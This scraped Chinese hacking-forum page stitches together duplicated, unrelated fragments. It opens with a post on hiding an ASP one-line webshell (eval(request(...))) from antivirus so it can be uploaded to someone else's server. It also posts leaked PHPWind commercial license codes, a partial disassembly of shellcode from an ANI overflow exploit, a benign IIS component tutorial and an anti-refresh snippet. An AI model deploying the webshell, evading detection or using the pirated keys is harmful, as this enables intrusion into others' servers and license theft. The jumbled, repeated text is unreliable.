0
2007/07/13 
10:26 
547
怎么让你的ASP马儿更安全,更深的隐藏到对方的程序中
昨天朋友叫我帮他传个马,进过抓包分析,发现可以上传ASP,但上传后文件竟然找不到了。估计是被杀了,我们先看马儿的代码:
<%eval(request("#"))%>
(小注:海洋的一句话后门。我前面有个写后门的贴子是怎么隐藏生成这样的后门。)
杀毒软件会读取特征字符串
eval(request("
而它们都是关键词,怎么变形呢?拆分单词肯定是不行的。
我们把两个东东分开来写,加个变量进去。
昨天朋友叫我帮他传个马,进过抓包分析,发现可以上传ASP,但上传后文件竟然找不到了。估计是被杀了,我们先看马儿的代码:
<%eval(request("#"))%>
(小注:海洋的一句话后门。我前面有个写后门的贴子是怎么隐藏生成这样的后门。)
杀毒软件会读取特征字符串
eval(request("
而它们都是关键词,怎么变形呢?拆分单词肯定是不行的。
我们把两个东东分开来写,加个变量进去。
from:冰封浪子's blog
放几套商业版的PHPWIND cecheck代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
支付类型: 3.VIP支持型
BBS网址: phpwind.net
授权代码3.X:
07188b783d8da0c2f5dcff6b96468adf747ee4de99b5fb7ecdff7e30713a29586cc56aa844760510772121cc44b61e0c56890
授权代码4.X:
1d40180c14f6a303168315e3063842f973eafecfe8639399bbdebf566b2f04570315f54f41f45156a78d9b610a5125ca08cdd60c469be0716bc4d1ef0
支付类型: 企业版
BBS网址: cnhacker.com
放几套商业版的PHPWIND cecheck代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
支付类型: 3.VIP支持型
BBS网址: phpwind.net
授权代码3.X:
07188b783d8da0c2f5dcff6b96468adf747ee4de99b5fb7ecdff7e30713a29586cc56aa844760510772121cc44b61e0c56890
授权代码4.X:
1d40180c14f6a303168315e3063842f973eafecfe8639399bbdebf566b2f04570315f54f41f45156a78d9b610a5125ca08cdd60c469be0716bc4d1ef0
支付类型: 企业版
BBS网址: cnhacker.com
服务器端组件
首先,服务器端的组件要有别于客户端的组件.客户端的组件是通过网络传输,依靠HTML来起作用.而且只能在IE上有用.但是服 务器端的组件是运行在服务器端,它在服务器上执行各种操作.因此,所有的浏览器都能享用,它依*的是服务器而不是浏览器.
当IIS被请求执行一个ASP程序,它首先会在ASP文件中找到<%%>标签之间的代码,并且执行它(也可以是<script runat=server></script>之间的代码).如果这个ASP程序在先前被调用过,那么它就会用 内存中的编译过的程序来向用户返回HTML代码,如果没有,那么它就重新编译.这里ASP就比CGI多一点速度优势,因为CGI 是每一个请求都使用一个线程.这样就大大消耗了服务器的资源.
想不想你写的程序自己就能在IIS运行!?!现在你就行了!使用VB5(当然现在是VB6了),你就能建立DynamicLin kedLibraries(DLL文件),它能在IIS上直接运行(如果有asp文件来请求的话).
系统和软件的要求
你需要一个32位的操作系统来运行ASP.当然你也得安装IIS或PWS.我们下面的程序是在windows95+PWS+VB 5的环境下开发的.
首先,服务器端的组件要有别于客户端的组件.客户端的组件是通过网络传输,依靠HTML来起作用.而且只能在IE上有用.但是服 务器端的组件是运行在服务器端,它在服务器上执行各种操作.因此,所有的浏览器都能享用,它依*的是服务器而不是浏览器.
当IIS被请求执行一个ASP程序,它首先会在ASP文件中找到<%%>标签之间的代码,并且执行它(也可以是<script runat=server></script>之间的代码).如果这个ASP程序在先前被调用过,那么它就会用 内存中的编译过的程序来向用户返回HTML代码,如果没有,那么它就重新编译.这里ASP就比CGI多一点速度优势,因为CGI 是每一个请求都使用一个线程.这样就大大消耗了服务器的资源.
想不想你写的程序自己就能在IIS运行!?!现在你就行了!使用VB5(当然现在是VB6了),你就能建立DynamicLin kedLibraries(DLL文件),它能在IIS上直接运行(如果有asp文件来请求的话).
系统和软件的要求
你需要一个32位的操作系统来运行ASP.当然你也得安装IIS或PWS.我们下面的程序是在windows95+PWS+VB 5的环境下开发的.
标 题: 【原创】一份shellcode的详细分析
作 者: edisonH
时 间: 2007-06-09,23:30
链 接: http://bbs.pediy.com/showthread.php?t=46068
这是从一个ani溢出攻击的xxx.ani文件中提取出来的一份shellcode,做了下分析
这里,先要谢谢forgot,解答我关于pPEB>0x80000000的问题,原来是检测win9x用的,谢谢
好了,进入正题吧
代码:
02A200AC mov ebp, esp
02A200AE mov edx, fs:[30] ; pPeb
02A200B5 lea edx, [edx+3] ; pPeb->SpareBool
02A200B8 cmp byte ptr [edx], 1 ; 判断shellcode是否已运行
02A200BB je 02A20189
02A200C1 mov byte ptr [edx], 1 ; 设置shellcode已运行
02A200C4 call 02A20214 ; FARPROC Get_GlobalAlloc_Addr()
; {
作 者: edisonH
时 间: 2007-06-09,23:30
链 接: http://bbs.pediy.com/showthread.php?t=46068
这是从一个ani溢出攻击的xxx.ani文件中提取出来的一份shellcode,做了下分析
这里,先要谢谢forgot,解答我关于pPEB>0x80000000的问题,原来是检测win9x用的,谢谢
好了,进入正题吧
代码:
02A200AC mov ebp, esp
02A200AE mov edx, fs:[30] ; pPeb
02A200B5 lea edx, [edx+3] ; pPeb->SpareBool
02A200B8 cmp byte ptr [edx], 1 ; 判断shellcode是否已运行
02A200BB je 02A20189
02A200C1 mov byte ptr [edx], 1 ; 设置shellcode已运行
02A200C4 call 02A20214 ; FARPROC Get_GlobalAlloc_Addr()
; {
来源: ruery's blog
根据计数器防刷新原理作出以下的代码,Session.这个判断比Cookie更加方便,不光可以IP认证,还可以防刷新模式!不过先说明一下啊,如果你的站正常的访问量很大的话,就要用了,因为Session同样消耗资源!
转换asp<%if session(“refresh”)<> 1 thenSession(“ refresh”)=session(“ refresh”)+1Response.redirect “index.asp”End if%>
转为js <script language="JavaScript"><!--document.writeln("<%");document.writeln("if session(“refresh”)<> 1 then");document.writeln("Session(“ refresh”)=session(“ refresh”)+1");document.writeln("Response.redirect “index.asp”");document.writeln("End if");document.writeln("%>");//--></script>
转为perl print "<%\n";print "if session(“refresh”)<> 1 then\n";print "Session(“ refresh”)=session(“ refresh”)+1\n";print "Response.redirect “index.asp”\n";print "End if\n";print "%>\n";转为php <?phpecho "<%\n";echo "if session(“refresh”)<> 1 then\n";echo "Session(“ refresh”)=session(“ refresh”)+1\n";echo "Response.redirect “index.asp”\n";echo "End if\n";echo "%>\n";?>转为jsp <%out.println("<%");out.println("if session(“refresh”)<> 1 then");out.println("Session(“ refresh”)=session(“ refresh”)+1");out.println("Response.redirect “index.asp”");out.println("End if");out.println("%>");%>
根据计数器防刷新原理作出以下的代码,Session.这个判断比Cookie更加方便,不光可以IP认证,还可以防刷新模式!不过先说明一下啊,如果你的站正常的访问量很大的话,就要用了,因为Session同样消耗资源!
转换asp<%if session(“refresh”)<> 1 thenSession(“ refresh”)=session(“ refresh”)+1Response.redirect “index.asp”End if%>
转为js <script language="JavaScript"><!--document.writeln("<%");document.writeln("if session(“refresh”)<> 1 then");document.writeln("Session(“ refresh”)=session(“ refresh”)+1");document.writeln("Response.redirect “index.asp”");document.writeln("End if");document.writeln("%>");//--></script>
转为perl print "<%\n";print "if session(“refresh”)<> 1 then\n";print "Session(“ refresh”)=session(“ refresh”)+1\n";print "Response.redirect “index.asp”\n";print "End if\n";print "%>\n";转为php <?phpecho "<%\n";echo "if session(“refresh”)<> 1 then\n";echo "Session(“ refresh”)=session(“ refresh”)+1\n";echo "Response.redirect “index.asp”\n";echo "End if\n";echo "%>\n";?>转为jsp <%out.println("<%");out.println("if session(“refresh”)<> 1 then");out.println("Session(“ refresh”)=session(“ refresh”)+1");out.println("Response.redirect “index.asp”");out.println("End if");out.println("%>");%>
